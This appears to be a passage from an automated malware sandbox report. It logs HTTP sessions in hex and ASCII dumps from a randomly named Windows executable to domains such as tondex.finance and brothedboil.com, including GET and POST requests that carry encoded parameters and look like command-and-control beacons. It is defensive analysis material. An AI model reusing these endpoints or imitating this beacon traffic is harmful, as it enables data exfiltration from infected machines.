6f 50 5a 45 48 77 4c 36 39 71 56 39 44 55 50 6a 43 6e 67 70 51 62 7a 64 74 2f 44 73 66 62 6b 4c 5a 5a 67 69 53 55 34 43 4f 57 32 42 57 78 59 73 69 6c 65 7a 78 69 39 6b 67 36 58 53 4f 41 66 69 78 43 56 54 78 58 67 32 64 68 67 45 42 53 48 34 5a 6f 32 59 65 4e 36 4d 34 45 42 31 78 35 2f 6a 73 69 78 71 4c 68 66 35 61 42 56 71 50 36 4c 79 64 64 4e 32 54 44 41 70 45 73 4b 58 55 6f 65 51 4d 70 62 53 64 78 77 4b 43 74 6a 33 70 57 64 63 37 79 7a 46 51 6b 65 6e 52 48 70 75 5a 57 63 4b 53 74 54 50 68 62 66 78 30 78 36 63 36 31 79 53 33 6a 2b 4e 32 44 53 31 70 6c 5a 4d 67 6c 51 65 54 56 2f 46 2f 52 62 63 57 4d 2b 59 33 5a 58 31 2f 59 42 67 2b 52 59 41 43 4c 79 44 75 4f 36 35 36 65 58 67 63 67 7a 69 6c 61 44 58 50 45 67 42 35 73 62 6d 51 50 39 45 76 44 4f 6d 59 30 33 57 36 63 44 38 62 5a 78 35 61 38 44 6b 73 6d 4c 4a 4f 52 75 55 50 30 61 4f 56 79 47 6c 38 6f 79 4b 42 32 57 57 69 38 44 46 77 4b 4c 79 43 7a 65 6a 76 4a 73 74 65 46 4d 34 70 77 43 44 2b 39 52 4b 4d 4a 46 69 51 45 6a 72 71 78 64 43 70 39 66 2b 49 4b 6e 49 42 73 59 4c 58 48 50 5a 43 45 4d 44 48 45 73 61 4e 66 55 4b 37 64 32 76 34 34 78 41 55 6f 58 35 45 79 62 73 4b 54 77 34 34 5a 4b 5a 6b 74 45 35 6c 54 66 50 38 37 77 33 4b 77 6d 39 30 53 76 79 6c 4a 6a 4a 45 66 5a 44 56 6e 35 72 76 6d 78 68 6f 6e 6a 2b 4c 33 39 79 62 6f 54 79 4a 30 61 4b 6b 61 30 69 52 37 5a 41 37 46 76 45 4c 49 67 73 41 4b 38 6f 4f 6e 51 37 63 33 6e 5a 31 6b 59 74 7a 6b 66 44 4c 53 4d 45 63 57 39 52 59 63 4d 63 48 31 72 65 63 31 62 6b 38 70 6c 54 53 63 72 65 46 4d 76 39 6a 2b 50 55 4b 33 31 6f 4b 66 51 6a 2b 42 69 76 4c 55 48 30 4e 32 73 45 62 70 62 6b 52 70 54 48 76 55 47 30 79 6e 78 61 4c 49 32 70 54 37 4f 32 64 31 78 41 41 57 6d 42 65 4e 58 79 2f 41 46 73 50 6f 6e 68 46 41 57 71 70 67 42 4b 57 52 6b 6a 45 4e 30 38 36 6b 79 77 54 56 72 64 36 73 44 65 4a 49 72 6b 43 55 2b 34 50 74 42 73 70 43 63 62 77 30 2f 37 32 30 51 78 55 6d 57 79 49 56 32 6f 79 35 53 2b 64 6a 58 64 4d 47 41 32 6d 32 37 35 57 76 71 72 6d 73 78 78 2b 77 66 79 79 71 51 73 72 4f 48 67 4d 4d 50 31 62 55 65 68 66 79 47 67 42 76 69 32 52 47 5a 52 37 68 70 48 58 55 50 6b 65 63 56 55 37 42 36 31 2b 45 2b 76 77 56 35 33 35 63 75 44 76 6a 72 5a 35 5a 47 5a 30 67 44 43 5a 37 42 72 64 53 44 61 70 67 6c 6d 57 62 77 4b 39 77 67 50 30 33 63 32 57 48 48 2b 69 73 53 7a 53 64 79 44 6c 35 52 2f 71 2f 64 48 79 67 54 45 33 2f 45 58 32 31 31 79 49 48 41 6b 34 7a 4d 7a 55 71 41 51 50 44 52 55 4b 37 37 59 53 79 65 44 65 62 55 78 46 6f 58 50 2b 56 42 55 4a 4d 43 61 56 66 6c 34 61 58 6f 4f 50 5a 74 4f 34 43 72 41 32 5a 67 65 4a 79 46 42 62 7a 64 76 46 34 2f 78 68 4c 46 38 46 35 63 32 4d 48 49 46 61
                                                                                              Data Ascii: 12l42=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
                                                                                              Apr 24, 2024 07:28:52.778855085 CEST701INHTTP/1.1 405 Not Allowed
                                                                                              date: Wed, 24 Apr 2024 05:28:52 GMT
                                                                                              content-type: text/html
                                                                                              content-length: 556
                                                                                              server: NginX
                                                                                              connection: close
                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              40192.168.2.44978191.195.240.19801620C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Apr 24, 2024 07:28:55.307064056 CEST457OUTGET /3g97/?12l42=SimubthO8j6ps9851O6iFrPFbhU0j9rq0/tYQBfzEgGK5hVM85jEDi8N6ZmkhSeBx8n/pYDrpewbJx/zj6rVSge67MmYz8zyJ6w88vNyo3JtRae+fbqeQKU=&AlB=sdJPX HTTP/1.1
                                                                                              Host: www.brothedboil.com
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Connection: close
                                                                                              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                              Apr 24, 2024 07:28:55.969573975 CEST1289INHTTP/1.1 200 OK
                                                                                              date: Wed, 24 Apr 2024 05:28:55 GMT
                                                                                              content-type: text/html; charset=UTF-8
                                                                                              transfer-encoding: chunked
                                                                                              vary: Accept-Encoding
                                                                                              x-powered-by: PHP/8.1.17
                                                                                              expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                              cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                              pragma: no-cache
                                                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_NaZKrRTRgWemhl00YBRNWY038LOpPrfM5J/8/1fs1QO9sD+YlTbtAqcHs6JJ9uYhlOrdvlhX6s3SYSBFNmp7eg==
                                                                                              last-modified: Wed, 24 Apr 2024 05:28:55 GMT
                                                                                              x-cache-miss-from: parking-55fd589654-f8w9d
                                                                                              server: NginX
                                                                                              connection: close
                                                                                              Data Raw: 32 43 46 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 4e 61 5a 4b 72 52 54 52 67 57 65 6d 68 6c 30 30 59 42 52 4e 57 59 30 33 38 4c 4f 70 50 72 66 4d 35 4a 2f 38 2f 31 66 73 31 51 4f 39 73 44 2b 59 6c 54 62 74 41 71 63 48 73 36 4a 4a 39 75 59 68 6c 4f 72 64 76 6c 68 58 36 73 33 53 59 53 42 46 4e 6d 70 37 65 67 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 62 72 6f 74 68 65 64 62 6f 69 6c 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 62 72 6f 74 68 65 64 62 6f 69 6c 20 52 65 73 6f 75 72 63 65 73 20 61 6e 64 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 62 72 6f 74 68 65 64 62 6f 69 6c 2e 63 6f 6d 20 69 73 20 79 6f 75 72 20 66 69 72 73 74 20 61 6e 64 20 62 65 73 74 20 73 6f 75 72 63 65 20 66 6f 72 20 61 6c 6c 20 6f 66 20 74 68 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 79 6f 75 e2 80 99 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 20 46 72 6f 6d 20 67 65 6e
                                                                                              Data Ascii: 2CF<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_NaZKrRTRgWemhl00YBRNWY038LOpPrfM5J/8/1fs1QO9sD+YlTbtAqcHs6JJ9uYhlOrdvlhX6s3SYSBFNmp7eg==><head><meta charset="utf-8"><title>brothedboil.com&nbsp;-&nbsp;brothedboil Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="brothedboil.com is your first and best source for all of the information youre looking for. From gen
                                                                                              Apr 24, 2024 07:28:55.969628096 CEST1289INData Raw: 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d 6f 72 65 20 6f 66 20 77 68 61 74 20 79 6f 75 20 77 6f 75 6c 64 20 65 78 70 65 63 74 20 74 6f 20 66 69 6e 64 20 68 65 72 65 2c 20 62 72 6f 74 68 65 64 62 6f 69 6c 2e 63 6f 6d 20 68 61 73 20 69 74 20
                                                                                              Data Ascii: eral topics to more of what you would expect to find here, brothedboil.com has it all. We hope you find 576what you are searching for!"><link rel="icon" type="image/png" href="//img.sedoparking.com/templates/logos/s
                                                                                              Apr 24, 2024 07:28:55.969669104 CEST1289INData Raw: 75 74 74 6f 6e 2c 69 6e 70 75 74 2c 6f 70 74 67 72 6f 75 70 2c 73 65 6c 65 63 74 2c 74 65 78 74 61 72 65 61 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 6c 69 6e 65 2d 68 65
                                                                                              Data Ascii: utton,input,optgroup,select,textarea{font-family:sans-serif;font-size:100%;line-height:1.15;margin:0}button,input{overflow:visible}button,select{text-transform:none}button,html [type=button],[type=reset],[type=submit]{-w595ebkit-appearance
                                                                                              Apr 24, 2024 07:28:55.969707966 CEST1289INData Raw: 67 72 6f 75 6e 64 3a 23 30 65 31 36 32 65 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 70 61 64 64 69 6e 67 3a 30 20 35 70 78 7d 2e 61 6e 6e 6f 75 6e 63 65 6d 65 6e 74 20 70 7b 63 6f 6c 6f 72 3a 23 38 34 38 34 38 34 7d 2e 61 6e 6e 6f
                                                                                              Data Ascii: ground:#0e162e;text-align:center;padding:0 5px}.announcement p{color:#848484}.announcement a{color:#848484}.container-header{margin:0 auto 0 auto;text-align:center}.container-header__content{color:#848484}.container-buybox{text-align:center}.c
                                                                                              Apr 24, 2024 07:28:55.969748020 CEST1289INData Raw: 6f 6e 74 65 6e 74 2d 74 65 78 74 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 69 6d 70 72 69 6e 74 5f 5f 63 6f 6e 74 65 6e 74 2d 6c 69 6e 6b 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 70 78 3b 63 6f 6c 6f 72 3a 23 39 34 39 34 39 34 7d 2e 63 6f 6e 74 61 69 6e
                                                                                              Data Ascii: ontent-text,.container-imprint__content-link{font-size:10px;color:#949494}.container-contact-us{text-align:center}.container-contact-us__content{display:inline-block}.container-contact-us__content-text,.container-contact-us__content-link{font-
                                                                                              Apr 24, 2024 07:28:55.969786882 CEST1289INData Raw: 6e 3a 61 6c 6c 20 2e 33 73 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 61 6c 6c 20 2e 33 73 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6f 6b 69 65 2d 6d 6f 64 61 6c 2d 77 69 6e 64 6f 77 5f 5f 63 6f 6e 74 65 6e 74 2d 68 65 61 64 65
                                                                                              Data Ascii: n:all .3s;transition:all .3s;text-align:center}.cookie-modal-window__content-header{font-size:150%;margin:0 0 15px}.cookie-modal-window__content{text-align:initial;margin:10% auto;padding:40px;background:#fff;display:inline-block;max-width:550
                                                                                              Apr 24, 2024 07:28:55.969913006 CEST1289INData Raw: 38 33 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 6d 65 64 69 75 6d 7d 2e 62 74 6e 2d 2d 73 65 63 6f 6e 64 61 72 79 2d 73 6d 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 38 63 39 35 39 63 3b 62 6f 72 64 65 72 2d
                                                                                              Data Ascii: 83;color:#fff;font-size:medium}.btn--secondary-sm{background-color:#8c959c;border-color:#8c959c;color:#fff;font-size:initial}.btn--secondary-sm:hover{background-color:#727c83;border-color:#727c83;color:#fff;font-size:initial}.switch input{opac
                                                                                              Apr 24, 2024 07:28:55.969952106 CEST1289INData Raw: 3b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 5f 5f 63 6f 6e 74 61 69 6e 65 72 2d 72 65 6c 61 74 65 64 6c 69 6e 6b 73 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f
                                                                                              Data Ascii: ;margin:0 auto !important}.container-content__container-relatedlinks,.container-content__container-ads,.container-content__webarchive{width:30%;display:inline-block}.container-content__container-relatedlinks{margin-top:147px;flex-grow:1;width:
                                                                                              Apr 24, 2024 07:28:55.969989061 CEST1289INData Raw: 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 5f 5f 72 69 67 68 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 2d 79 3a 74 6f 70 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 2d 2d 77 61 20 2e 63 6f 6e 74 61 69 6e
                                                                                              Data Ascii: container-content__right{background-position-y:top}.container-content--wa .container-content__left{background-position-y:top}.container-content--wa .container-content__right{background-position-y:top}.two-tier-ads-list{padding:0 0 1.6em 0}.two
                                                                                              Apr 24, 2024 07:28:55.970030069 CEST1025INData Raw: 77 6f 72 64 3b 6c 69 73 74 2d 73 74 79 6c 65 3a 6e 6f 6e 65 7d 2e 77 65 62 61 72 63 68 69 76 65 2d 62 6c 6f 63 6b 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 6c 69 6e 6b 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 30 70 78 3b 66 6f 6e 74 2d 73 69
                                                                                              Data Ascii: word;list-style:none}.webarchive-block__list-element-link{line-height:30px;font-size:20px;color:#9fd801}.webarchive-block__list-element-link:link,.webarchive-block__list-element-link:visited{text-decoration:none}.webarchive-block__list-element
                                                                                              Apr 24, 2024 07:28:56.274682999 CEST1289INData Raw: 35 37 36 0d 0a 2f 77 77 77 2e 62 72 6f 74 68 65 64 62 6f 69 6c 2e 63 6f 6d 22 2c 22 64 6e 73 68 22 3a 74 72 75 65 2c 22 64 70 73 68 22 3a 66 61 6c 73 65 2c 22 74 6f 53 65 6c 6c 22 3a 66 61 6c 73 65 2c 22 63 64 6e 48 6f 73 74 22 3a 22 69 6d 67 2e
                                                                                              Data Ascii: 576/www.brothedboil.com","dnsh":true,"dpsh":false,"toSell":false,"cdnHost":"img.sedoparking.com","adblockkey":" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tH


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              41192.168.2.44978291.195.240.19801620C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Apr 24, 2024 07:29:18.390719891 CEST731OUTPOST /3g97/ HTTP/1.1
                                                                                              Host: www.tondex.finance
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Connection: close
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 202
                                                                                              Cache-Control: max-age=0
                                                                                              Origin: http://www.tondex.finance
                                                                                              Referer: http://www.tondex.finance/3g97/
                                                                                              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                              Data Raw: 31 32 6c 34 32 3d 6e 66 46 57 50 4f 4d 46 2b 54 6e 73 54 72 30 76 65 38 4f 61 62 77 5a 4b 59 6e 4c 48 54 4f 69 32 48 37 61 4c 6c 44 6f 76 34 4d 53 72 4d 58 74 53 4d 34 56 32 2f 75 51 6d 63 62 56 32 64 76 54 77 2f 6b 32 64 72 4c 2b 79 57 42 72 69 34 70 44 6d 4b 33 61 62 45 46 6b 75 44 48 6d 49 34 6f 37 62 54 49 62 76 71 46 53 56 42 77 38 36 52 48 32 33 79 33 66 59 63 58 42 78 4e 32 45 34 47 61 6b 2f 37 57 65 4b 2b 55 42 4c 63 4c 61 47 6f 73 38 79 71 72 2b 78 5a 50 76 31 75 49 4d 6f 52 72 70 32 33 71 79 63 64 77 52 49 4c 71 72 32 7a 52 71 57 62 38 48 62 42 4d 53 4c 77 6f 54 37 6a 65 78 32 75 77 3d 3d
